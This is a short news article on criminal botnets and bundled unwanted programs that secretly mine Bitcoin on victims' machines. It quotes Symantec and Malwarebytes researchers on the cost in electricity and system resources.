Bitcoin mining is the process used to earn Bitcoins. In a normal situation the user agrees to run the algorithm used to authenticate transactions on the platform and is rewarded with Bitcoins for their trouble. The practice requires vast computational and electric power and is a key reason miners often use high-power, dedicated mining machines to earn the crypto currency.
The cost of maintaining the Bitcoin mining machines, coupled with the currencies' ever-growing value has led many criminal groups to alter their botnet empires to begin mining the currency. Symantec estimated that the botnet Bitcoin operations are causing as much as $560,887 worth of harm per day in electricity use alone.
Kujawa supported Symantec's claim, confirming that the new PUPs' mining programs are using as much as 50 percent of the victim system's resources.
The Malwarebytes researcher said he expects to see more Bitcoin scams in the near future, as criminal groups expand to find new ways to increase the yield of their mining operations.
"When used legitimately by willing participants, they help the Bitcoin network run more efficiently and make extra cash for those willing to put in the effort. The unfortunate side is that while anyone can run a miner, anyone can also force a miner to run on a system, even if it isn't their own," read the post.
Kujawa's forecast mirrors that of many security researchers. F-Secure chief research officer Mikko Hypponen joked that the value of Bitcoins will lead hackers to turn any IP-enabled device they can, including toasters, into mining machines at an event in Helsinki earlier this year.